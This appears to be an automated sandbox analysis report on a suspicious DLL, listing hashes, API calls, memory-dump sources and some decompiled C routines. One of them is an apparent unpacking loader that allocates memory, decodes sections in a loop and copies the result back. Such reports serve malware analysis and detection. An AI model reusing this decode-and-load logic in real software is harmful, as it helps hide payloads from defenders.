    • Opcode ID: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction ID: 35cc19189a2f0fc8b008971ae3c199cd004566ee5b58b77260024d7b70d8c769
    • Opcode Fuzzy Hash: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction Fuzzy Hash: FBF0EC315046699BCB18DB58E4C9E3673E9AA86714762CC16F165D7D10CF20F9814A92
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 6D52F296
    • CatchIt.LIBVCRUNTIME ref: 6D52F37C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    • Opcode ID: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction ID: a149f0fe58e4c2dfae35c050c13240cf5a38d9f4efe91a3d641bacf0499868ba
    • Opcode Fuzzy Hash: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction Fuzzy Hash: 4541877190020AEFCF0ACFA5DC80AEEBBB6FF48344F158498FA05A7690D3359A54DB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __is_exception_typeof.LIBVCRUNTIME ref: 6D52B6A2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __is_exception_typeof
    • String ID: MOC$RCC$csm
    • API String ID: 3140442014-2671469338
    • Opcode ID: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction ID: 65002f9509fbad7b982c144353000c565b5793898702aadffe886003448096e7
    • Opcode Fuzzy Hash: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction Fuzzy Hash: E51190311042069FD70CEF65C405BAAB7B8EF80319F164899D9618BAA1DB74FD44CB92
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A17C
      • Part of subcall function 6D52E171: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D528974,?,?,?,6D528974,?,6D571A64), ref: 6D52E1D1
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A19C
    • std::regex_error::regex_error.LIBCPMT ref: 6D52A1BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
    • String ID: bad function call
    • API String ID: 182364050-3612616537
    • Opcode ID: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction ID: 821b17d38d87001d10ad88e0c54a7a50f43c3187920555c8d0b2ac57b33860c0
    • Opcode Fuzzy Hash: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction Fuzzy Hash: FE014B78D0810CBBCF08FBF4DC55CED777DAB50100F914420EB2092999EB74AA1D8AE1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction ID: 28a116ae2d610d7241b0095b3a87153722b14fbd7b8edaf7050acac51c309f4a
    • Opcode Fuzzy Hash: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction Fuzzy Hash: ADB158329082869FDB09DF68C8807FEBBF5EF95344F15C5AAD8409BA41D7348D02CB52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __EH_prolog3.LIBCMT ref: 6D5329C2
    • UnDecorator::getSymbolName.LIBCMT ref: 6D532A50
    • DName::operator+.LIBCMT ref: 6D532B54
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::DName.LIBVCRUNTIME ref: 6D532C11
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
    • String ID:
    • API String ID: 334624791-0
    • Opcode ID: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction ID: 587d2070596cf407629af46028d83733f3b256ece8c05a4906e21d4246238f51
    • Opcode Fuzzy Hash: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction Fuzzy Hash: 89818C71C05B6A9FDF19CF98D490BEEBBB4FB0A314F06845AD514ABA40E770D944CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 463ba503fbb3b0819dcbe6e3f4c28e25c10fb48d53c2e950280cfab30cd6551c
    • Instruction ID: 26e74fac6d2ba16532016b230caa9d8b2aa9705fdeb7cc2bb171e2082c77197a
    • Opcode Fuzzy Hash: 463ba503fbb3b0819dcbe6e3f4c28e25c10fb48d53c2e950280cfab30cd6551c
    • Instruction Fuzzy Hash: 1751BF726046029FEB2D8F64D891BBA77B5FF81310F10492DE91197ED1E731E888CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D5330ED
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D5330FA
    • DName::operator=.LIBVCRUNTIME ref: 6D53317A
    • DName::DName.LIBVCRUNTIME ref: 6D53319A
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
    • String ID:
    • API String ID: 2448499823-0
    • Opcode ID: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction ID: 8f2ad706809acf011a399084095663370adedff8d9835a7f0ca3f68c03d70b1d
    • Opcode Fuzzy Hash: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction Fuzzy Hash: 32513E70944365DFEB0ECF98C880AAEBBB4FB47341F028596E5155BA50E7B09A41CF91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E6D5015A3(void* __edi, intOrPtr _a4) {
    				intOrPtr _v8;
    				unsigned int _v12;
    				intOrPtr _v16;
    				char _v20;
    				void* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				void* _v36;
    				signed int _v44;
    				signed int _v48;
    				intOrPtr _t39;
    				void* _t46;
    				intOrPtr _t47;
    				intOrPtr _t50;
    				signed int _t59;
    				signed int _t61;
    				intOrPtr _t66;
    				intOrPtr _t77;
    				void* _t78;
    				signed int _t80;
    
    				_t77 =  *0x6d5041b0;
    				_t39 = E6D501A4B(_t77,  &_v20,  &_v12);
    				_v16 = _t39;
    				if(_t39 == 0) {
    					asm("sbb ebx, ebx");
    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
    					_t78 = _t77 + _v20;
    					_v36 = _t78;
    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
    					_v24 = _t46;
    					if(_t46 == 0) {
    						_v16 = 8;
    					} else {
    						_t61 = 0;
    						if(_t59 <= 0) {
    							_t47 =  *0x6d5041cc;
    						} else {
    							_t66 = _a4;
    							_t50 = _t46 - _t78;
    							_t11 = _t66 + 0x6d505137; // 0x6d505137
    							_v28 = _t50;
    							_v32 = _t50 + _t11;
    							_v8 = _t78;
    							while(1) {
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								_t19 = _t61 + 1; // 0x2
    								_t80 = _t19;
    								E6D501D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
    								_t64 = _v32;
    								_v8 = _v8 + 0x1000;
    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
    								_t61 = _t80;
    								 *0x6d5041cc = _t47;
    								if(_t61 >= _t59) {
    									break;
    								}
    								_t50 = _v28;
    							}
    						}
    						if(_t47 != 0x63699bc3) {
    							_v16 = 0xc;
    						} else {
    							memcpy(_v36, _v24, _v12);
    						}
    						VirtualFree(_v24, 0, 0x8000);
    					}
    				}
    				return _v16;
    			}
























    APIs
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: Virtual$AllocFreememcpy
    • String ID: Mar 26 2021
    • API String ID: 4010158826-2175073649
    • Opcode ID: 6841a88af6c7080ea38ebe24bc6bb506a889d254a2cfdb9359d2cb1a609a6e0f
    • Instruction ID: dee5039b5451ba280654101fa7319c3c88ae9f5f6a7798bcc8bf29fbae0ae639
    • Opcode Fuzzy Hash: 6841a88af6c7080ea38ebe24bc6bb506a889d254a2cfdb9359d2cb1a609a6e0f
    • Instruction Fuzzy Hash: 21315E71E0060AABDF05CF99CD80FEEB7B9BF49308F148169D915EBA40D771AA058F91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D546A98: _free.LIBCMT ref: 6D546AA6
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
    • GetLastError.KERNEL32 ref: 6D545EFF
    • __dosmaperr.LIBCMT ref: 6D545F06
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D545F45
    • __dosmaperr.LIBCMT ref: 6D545F4C
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 240fbe5dbb2dcb07255acc46bf1b26b159b527e0c70bb8676c5822f0d12390cf
    • Instruction ID: 9eb6dafe7d9200fda7ed86e46f3837fcbaf97f0bd8a2a7210f85c49f2a23ce7f
    • Opcode Fuzzy Hash: 240fbe5dbb2dcb07255acc46bf1b26b159b527e0c70bb8676c5822f0d12390cf
    • Instruction Fuzzy Hash: CD21B8B160820ABF9B199FA5888097BB76CFF45368711C914F91897D50D731EC5187A3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::
    • String ID:
    • API String ID: 1333004437-0
    • Opcode ID: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction ID: 00a28af2d3f94d9731373130d1b5d8fe4acdc91d99ed917487ff96fa34ed6ece
    • Opcode Fuzzy Hash: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction Fuzzy Hash: DD31BF70D08268DFEF0DCFE8C844A9DBBB4BF06344F02845EE541ABA80EBB49845CB01
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction ID: e104195a36241c2f6cf32de74cfb38b75895c99db78d9499ec9cb6f28871afe4
    • Opcode Fuzzy Hash: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction Fuzzy Hash: 86212E31946122EBDB1686288E80B5A3F78AF467A0F11C922FD56FFA90D730DC0085E3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
    • _free.LIBCMT ref: 6D54361B
    • _free.LIBCMT ref: 6D543651
    • SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 6d30720fe181df6314c39c0f56063f37abea72c4e85c71cae7cfd25187940f0d
    • Instruction ID: 95d0528b326a27b6e433836493454785324b290c5f7c400f87f743fb48fea11a
    • Opcode Fuzzy Hash: 6d30720fe181df6314c39c0f56063f37abea72c4e85c71cae7cfd25187940f0d
    • Instruction Fuzzy Hash: 8C11C1711481139BFF1D16759C85B3A26696BC637AF238534F33886DE0DB218D044553
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,6D53654E,?,?,6D588E14,00000000,?,6D536735,00000004,6D56ABEC,6D56ABE4,6D56ABEC,00000000), ref: 6D53651D
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FreeLibrary
    • String ID:
    • API String ID: 3664257935-0
    • Opcode ID: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction ID: 426b599f5b4ce936f257fa4e4158f1f96369b24e0305c01b445ed3bb43ebeb40
    • Opcode Fuzzy Hash: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction Fuzzy Hash: 0D11C632A44332ABDF168B688C44B5D77B4AF02771F534A35F910E7A84F770E90086E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E6D501D32(void* __ecx, intOrPtr _a4) {
    				int _t4;
    				int _t9;
    				void* _t13;
    
    				_t13 = GetCurrentThread();
    				if(SetThreadAffinityMask(_t13, 1) != 0) {
    					SetThreadPriority(_t13, 0xffffffff);
    				}
    				_t4 = E6D5017A7(_a4);
    				_t9 = _t4;
    				if(_t9 == 0) {
    					SetThreadPriority(_t13, _t4);
    				}
    				asm("lock xadd [eax], ecx");
    				return _t9;
    			}







    APIs
    • GetCurrentThread.KERNEL32 ref: 6D501D35
    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D501D40
    • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6D501D53
    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D501D66
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$Priority$AffinityCurrentMask
    • String ID:
    • API String ID: 1452675757-0
    • Opcode ID: 7f1b3bbeb45c378bd781859f0c7e171b8924e2eba9f3509cb3d269e3d2c6fb35
    • Instruction ID: 912eb630870607a73d1147d285cbae17bbc4e0e8740de2f94741d91cbde4f8bf
    • Opcode Fuzzy Hash: 7f1b3bbeb45c378bd781859f0c7e171b8924e2eba9f3509cb3d269e3d2c6fb35
    • Instruction Fuzzy Hash: FFE092313063116BEB062A294C88F6F7BACDFD33367024339F624D25D0DB548C0586A6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001), ref: 6D558481
    • GetLastError.KERNEL32(?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000,00000001,?,6D5513FC,6D54A1AC), ref: 6D55848D
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(6D574940,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D55849D
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(6D56FFF8,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,?,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000), ref: 6D5584B2
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction ID: ca9a28d62a191b37c697dec5e38eecc61ba756f227df26cb1d4887d56c0ac264
    • Opcode Fuzzy Hash: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction Fuzzy Hash: C5F01536112129FBCF535F95DC08A8E3F76FB4E3A6B064511FE0886920C7328820AB92
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: -
    • API String ID: 269201875-2547889144
    • Opcode ID: 9091675e5ee01277a4355e9d51ff1a1ef51bdaa6ba45514266698a87500fddac
    • Instruction ID: 7f1ef56be1a11e8570ec3341c267fb7e764bbac703bf913c6f9f9b1deff4cab3
    • Opcode Fuzzy Hash: 9091675e5ee01277a4355e9d51ff1a1ef51bdaa6ba45514266698a87500fddac
    • Instruction Fuzzy Hash: FAC106319442569BDB2CDF64CC40BFA73B9FF49314F11C8AAD915A7980EBB19E80CB52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
    • Opcode ID: 1134f9e8c27b04b340c1708a31674581c04f4e75eaac8e8cd9332b924b49ba7e
    • Instruction ID: 5ebc70a673eb80c28e15da06f1dee0750bf19152bc34c7005694386a1b1c4f66
    • Opcode Fuzzy Hash: 1134f9e8c27b04b340c1708a31674581c04f4e75eaac8e8cd9332b924b49ba7e
    • Instruction Fuzzy Hash: D991073090425AAEDF1DCE69C450AFEBBB1EF42364F10CA46E875DBA91D3309552CB63
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe
    • API String ID: 0-2837366778
    • Opcode ID: 4717bc2923aaca1849f4a162cead2d34d0912a9234bb61f3b02e0b12c9541ef6
    • Instruction ID: 6a72655316f092c6fee162ecfc7533d483d24761977493ec83f12830eb8a5dd0
    • Opcode Fuzzy Hash: 4717bc2923aaca1849f4a162cead2d34d0912a9234bb61f3b02e0b12c9541ef6
    • Instruction Fuzzy Hash: DD41A571E04365EBDF1ACB99CC80A9EBBF8EF86310F124466E515D7A40FB709A01CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D52E6BF
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D52E773
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 3480331319-1018135373
    • Opcode ID: 3088ee9b3da4a6c3d8d0ae3b13eb3d029ff6ef6619e1dd698ebac3cdb1c62e73
    • Instruction ID: f94f3fed9b4fdd98a0b42d5a7c117e4e1fabbabe57137155f48bfc45716e9551
    • Opcode Fuzzy Hash: 3088ee9b3da4a6c3d8d0ae3b13eb3d029ff6ef6619e1dd698ebac3cdb1c62e73
    • Instruction Fuzzy Hash: B041F634A042499FCF08CF78C880AAE7BB5BF45318F188555E924DBBD1DB31E909CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D54703B: GetOEMCP.KERNEL32(00000000,6D5472AD,6D550B1E,00000000,?,?,00000000,?,6D550B1E), ref: 6D547066
    • _free.LIBCMT ref: 6D54730A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: H H
    • API String ID: 269201875-1816914026
    • Opcode ID: 184f393038e83f109f421203f593f43dd373a888e6112b06e49cddf4ea5da308
    • Instruction ID: 98822297e7caeaec5452d18ec0c3004cf1f69f58deea6511b265fc422c545157
    • Opcode Fuzzy Hash: 184f393038e83f109f421203f593f43dd373a888e6112b06e49cddf4ea5da308
    • Instruction Fuzzy Hash: 9431A37190824AAFDF09CF98C840BDE7BF4EF45358F228469EA1097690EB31DD51CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction ID: 320ebb8cc9b7f9ae688d4b65ec6c1f1d1e2a28de22e9a359cfa2196ae796c12e
    • Opcode Fuzzy Hash: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction Fuzzy Hash: 44219172D0461AAFCB298E25CD40E7F3A79EFC4BA4F024515F82557A90C7308D498FE0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A7EE
      • Part of subcall function 6D52B40D: RtlInitializeSListHead.NTDLL(6D588DD0), ref: 6D52B412
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D52A858
    • ___scrt_fastfail.LIBCMT ref: 6D52A8A2
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction ID: 9c8ae21e878c3c0282fbb5e741d260dd475e9d98cd92f08348496be605965202
    • Opcode Fuzzy Hash: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction Fuzzy Hash: 2721273254C2129EDF1D7BB49804FAC3B729F8226DF124816D680B7DC2DB32484EC6A6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction ID: e9374abefb1ccb153a20242b3a8ebceb6198635ec6c7f30bf1487769857007c1
    • Opcode Fuzzy Hash: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction Fuzzy Hash: 1BF0E93164457567EF1E5A76CC0CB7B3798AF82770B12C922E814DBC94DB20EA0586E3
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F268
    • GetLocaleInfoW.KERNEL32(?,20001004,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F291
    • GetACP.KERNEL32(?,?,6D54F4ED,?,00000000), ref: 6D54F2A6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction ID: ac97e00777d40908981faea32fca04b60d1a0b2c34faa57eaf7e2482a40eb842
    • Opcode Fuzzy Hash: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction Fuzzy Hash: E521A43AA4C102A6E75DCF5CCE01A9B73B6BB85B54B52CD24E905C7900E732DD40C762
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetACP.KERNEL32(?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54EAE6
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EB11
    • _wcschr.LIBVCRUNTIME ref: 6D54EBA5
    • _wcschr.LIBVCRUNTIME ref: 6D54EBB3
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D54EC74
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID:
    • API String ID: 4147378913-0
    • Opcode ID: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction ID: d78fea38672865cb5b77d662cfdd72af5e1de1b1ab1a210d5fb313ed846aef42
    • Opcode Fuzzy Hash: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction Fuzzy Hash: BB713B71644203AAE71EDB75CD49FB773A8FF85304F11C86AEA05D7980EB70E94187A2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D54F4B0
    • IsValidCodePage.KERNEL32(00000000), ref: 6D54F4F9
    • IsValidLocale.KERNEL32(?,00000001), ref: 6D54F508
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D54F550
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D54F56F
    Memory Dump Source
